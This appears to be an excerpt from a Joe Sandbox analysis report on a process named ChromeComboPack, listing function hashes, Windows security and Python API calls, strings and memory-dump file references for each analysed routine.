                                                                                                                                                                                                                                                • Opcode ID: 5d063a518c74a9428d61dbe571b0a0cfe69347eb100fb3d5cc1283e73626d560
                                                                                                                                                                                                                                                • Instruction ID: 019a429a294fab0e60f3bb38ca809d9df5276ea7189e8c20497f9ed7e1d25408
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d063a518c74a9428d61dbe571b0a0cfe69347eb100fb3d5cc1283e73626d560
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B018476A09A4197D768CF52F49442ABBB0F78CBA0B144165EBDE43B28DF3CE485CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorSecurity$ControlLengthfreemallocmemcpy
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3383347431-0
                                                                                                                                                                                                                                                • Opcode ID: 2bbe38348c2f00229164cbdda6c70da1ec05e543728ec76a17c1fda9eb1c925f
                                                                                                                                                                                                                                                • Instruction ID: cbe0197480995e1ac4505f7219181621b6174ac70364cd0f3d7beba93b50bd3d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bbe38348c2f00229164cbdda6c70da1ec05e543728ec76a17c1fda9eb1c925f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0311B127B09A0196EB088F6AE6502F96664FF88BD4F080035EF0D47A95DF2CD996C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _Py_NewReference.PYTHON312(?,?,?,00007FFD8A196FA7,?,?,?,00007FFD8A196DB3), ref: 00007FFD8A198A0D
                                                                                                                                                                                                                                                • GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FFD8A196FA7,?,?,?,00007FFD8A196DB3), ref: 00007FFD8A198A1E
                                                                                                                                                                                                                                                • GetSecurityDescriptorControl.ADVAPI32(?,?,?,00007FFD8A196FA7,?,?,?,00007FFD8A196DB3), ref: 00007FFD8A198A4F
                                                                                                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD8A196FA7,?,?,?,00007FFD8A196DB3), ref: 00007FFD8A198A68
                                                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,00007FFD8A196FA7,?,?,?,00007FFD8A196DB3), ref: 00007FFD8A198A7B
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorSecurity$ControlLengthReferencemallocmemcpy
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3412238872-0
                                                                                                                                                                                                                                                • Opcode ID: af7347515c41f927a2f41c8b097ef964e323764c9e35b540a02784828c4adbf5
                                                                                                                                                                                                                                                • Instruction ID: 495a22867516ce23eb86d4de2e8a0098ef32bb3f75a59ab1b57c25709926de17
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af7347515c41f927a2f41c8b097ef964e323764c9e35b540a02784828c4adbf5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95114C27B09B41A6EA489B6AA5103A96664FB84FD4F480071DF4D03B95DF7CE595C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_Err_ParseStringTuple
                                                                                                                                                                                                                                                • String ID: iiiiiiiii|i$year out of range
                                                                                                                                                                                                                                                • API String ID: 385655187-1001734015
                                                                                                                                                                                                                                                • Opcode ID: bdb6a63c852c7cf84773621299bc6dcc79d39ca74b6c218579789cb9ceecb365
                                                                                                                                                                                                                                                • Instruction ID: 1a13fd281c5b466e19d4b43f7e9bd86915e957add275e32576471a941d6c71ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdb6a63c852c7cf84773621299bc6dcc79d39ca74b6c218579789cb9ceecb365
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0318AB7B18B0596E318CF14D4545AC37E5F748F80B99827ACA9D87710DF3AE9A1C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Timefloor$SystemVariant
                                                                                                                                                                                                                                                • String ID: VariantTimeToSystemTime
                                                                                                                                                                                                                                                • API String ID: 1266533630-2676162551
                                                                                                                                                                                                                                                • Opcode ID: dc397b296f06fc7e1d3c323fad90fc2e41b045541a9b3741c62cc6411df5889f
                                                                                                                                                                                                                                                • Instruction ID: 5dca6a54fe16238b76447fb372829fe86011badd4d928b8e5ce6b4dd75d7696d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc397b296f06fc7e1d3c323fad90fc2e41b045541a9b3741c62cc6411df5889f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B31C452E2CF5564E207873498711B5E75ABFAA394B889373F85F71521EF2CB086C600
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseSizeTuple_
                                                                                                                                                                                                                                                • String ID: OiOOi(ii):MSG param$The object is not a PyHANDLE object
                                                                                                                                                                                                                                                • API String ID: 2270327996-2297966167
                                                                                                                                                                                                                                                • Opcode ID: 9424ad87bbcc8c5408d9988cc4dcd448fe0b5f34f80dcc76766e9d6ef4476183
                                                                                                                                                                                                                                                • Instruction ID: 60fcb6ceb8ee19b5fd36b2f2d136b958fb2405c45600d34c53f775b00a814e41
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9424ad87bbcc8c5408d9988cc4dcd448fe0b5f34f80dcc76766e9d6ef4476183
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43217F73B0AB06A1EB048F15D9600B977AAFB84BC4F980172CA4C47365EF3CE9A5C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_InitializeParseSizeTuple_
                                                                                                                                                                                                                                                • String ID: (bbbbbb)b:Initialize$InitializeSid
                                                                                                                                                                                                                                                • API String ID: 3719922413-750340051
                                                                                                                                                                                                                                                • Opcode ID: 2853aa2cb39919d957a981e66e38e641e7025cba95939f0fdf6db46d98927918
                                                                                                                                                                                                                                                • Instruction ID: f6f9026ea8a5e4d2e58562e9fcd79e222aee5eedb7714317191c4687d4631288
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2853aa2cb39919d957a981e66e38e641e7025cba95939f0fdf6db46d98927918
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E217937B09A46A1EF04CF21E8650BD37A1FB88B84B850172CA6E47650EF3DE959CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_DeleteParseTuple
                                                                                                                                                                                                                                                • String ID: DeleteAce$l:DeleteAce
                                                                                                                                                                                                                                                • API String ID: 1230908747-3702189175
                                                                                                                                                                                                                                                • Opcode ID: 580d4995c30976671ec43622fb1abc4abbc5c184b1a1d2acfc6d921f1e308c7f
                                                                                                                                                                                                                                                • Instruction ID: ec588a3c02a2b5a5462b6719e4b01ddd53b5c87394f3d7aba5a254bcd6c7c674
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 580d4995c30976671ec43622fb1abc4abbc5c184b1a1d2acfc6d921f1e308c7f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF01489BB1A68656E70A4F7594A02B83F70FF45F44F4880B1CA8D42251EE1CE4A6C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • DEVMODE structure of size %d greater than supported size of %d, xrefs: 00007FFD8A194D8C
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_Format
                                                                                                                                                                                                                                                • String ID: DEVMODE structure of size %d greater than supported size of %d
                                                                                                                                                                                                                                                • API String ID: 376477240-1470040908
                                                                                                                                                                                                                                                • Opcode ID: 31e2062cbb1e77be5c04455be555e42aabfdbaff16b487831bfbe25ff830af8d
                                                                                                                                                                                                                                                • Instruction ID: f2cb7bc8af0e546d8baec81025b43a185686660aee4408f4ec78a712e3ec66b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31e2062cbb1e77be5c04455be555e42aabfdbaff16b487831bfbe25ff830af8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60115216F26A02A1EF5C9F66D8A42782BE0FB98F98F881071CD0D47791DE2CF495C300
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: CloseHandle$The object is not a PyHANDLE object
                                                                                                                                                                                                                                                • API String ID: 0-4264222050
                                                                                                                                                                                                                                                • Opcode ID: 0e5af5bc048dff164d40552dc514e9a2b980e4fab7d31470d53ae96aeec852b1
                                                                                                                                                                                                                                                • Instruction ID: e3d90e4283ff4c41a5ae79a2d1895e1bac7c30bfaf3bf317d8a0f3991c255a5e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e5af5bc048dff164d40552dc514e9a2b980e4fab7d31470d53ae96aeec852b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E711A923F1BA42A2EF588F15D8B01752BA0FF88B58FC85171D61E82291EF2CE545C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_DescriptorOwnerParseSecurityTuple
                                                                                                                                                                                                                                                • String ID: :GetSecurityDescriptorOwner$GetSecurityDescriptorOwner
                                                                                                                                                                                                                                                • API String ID: 2338322640-1512101531
                                                                                                                                                                                                                                                • Opcode ID: 771e96b15b263e6d8951f84d50e1b1bf4d9c27dfebe04fc272ccadb699901be2
                                                                                                                                                                                                                                                • Instruction ID: f16e38611656c21058ffeed4aca14ac22550824be07b7c2e36ccc5825583af58
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 771e96b15b263e6d8951f84d50e1b1bf4d9c27dfebe04fc272ccadb699901be2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E017567F1AA06A2FB5C9F66E8603752760FF84B84F885071DA0D47395EE2CF595C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_CreateGuidParseReferenceSizeTuple_
                                                                                                                                                                                                                                                • String ID: :CreateGuid
                                                                                                                                                                                                                                                • API String ID: 2232489080-3559396464
                                                                                                                                                                                                                                                • Opcode ID: 09cfe9be1413eff01afa2bb2f16402033869353b27c53ba5146419ec9c390cd0
                                                                                                                                                                                                                                                • Instruction ID: 6a253e2c65a3b6b3ea869e19b0903e8280dd59afa89c95bb0a6e13677a294f3d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09cfe9be1413eff01afa2bb2f16402033869353b27c53ba5146419ec9c390cd0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C019267F09B41A1FA489F10F8611797BA0FB88B90F881175DA8E42365EF3CF194CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FromString$CharErr_Unicode_Wide
                                                                                                                                                                                                                                                • String ID: The string is too long
                                                                                                                                                                                                                                                • API String ID: 1358704699-1150129668
                                                                                                                                                                                                                                                • Opcode ID: d16902b345cacd23d2082d23a250b7d8911b8a85442355fbbb1c59808b897c3b
                                                                                                                                                                                                                                                • Instruction ID: 53f0b06ef449e31a3ed38cced84554b22eb67ccfe397f25a931a835ae41c13a5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d16902b345cacd23d2082d23a250b7d8911b8a85442355fbbb1c59808b897c3b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F01B537F05A41A1FB649B10E4603B93B60FBCCB64FC40271C55D466E4DE2CE105CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyEval_SaveThread.PYTHON312 ref: 00007FFD8A1952CA
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00007FFD8A1952D7
                                                                                                                                                                                                                                                • PyEval_RestoreThread.PYTHON312 ref: 00007FFD8A1952E2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C0AB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C11A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyUnicode_DecodeMBCS.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_BuildValue_SizeT.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C200
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C218
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyErr_SetObject.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C22D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_Dealloc.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C23C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Eval_Thread$BuildCloseDeallocDecodeErr_ErrorFormatFreeHandleLastLocalMessageObjectRestoreSaveSizeUnicode_Value_
                                                                                                                                                                                                                                                • String ID: CloseHandle
                                                                                                                                                                                                                                                • API String ID: 2420468086-2962429428
                                                                                                                                                                                                                                                • Opcode ID: a234cd2355cefa9f88078073659698f9681e44205f00e32605d73f6149afe859
                                                                                                                                                                                                                                                • Instruction ID: c6f926883289dcaf59a8b518a1b942ae1fb80bbc5633c7e2e075022691a0f0a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a234cd2355cefa9f88078073659698f9681e44205f00e32605d73f6149afe859
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF0AF27B1AA4082EB599B22B4A43B967A0FB88B50F581070DA4E43751DE3CE486C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_InitializeParseTuple
                                                                                                                                                                                                                                                • String ID: :Initialize$InitializeAcl
                                                                                                                                                                                                                                                • API String ID: 1991639834-2627007299
                                                                                                                                                                                                                                                • Opcode ID: 63bff58f03a89d83c8465e0b9a4330355ea6ebece3a6d91fa291ed6468edabb7
                                                                                                                                                                                                                                                • Instruction ID: 39f6f7272fd5d9dd8f2a075234b4b2edaf496e8e4019fa70524d3ad3e2222be8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63bff58f03a89d83c8465e0b9a4330355ea6ebece3a6d91fa291ed6468edabb7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6F09017B0A90691FB5C8F26EC6017527A1FF88F88F4890B1CA0E46360EE2CF0E2D300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
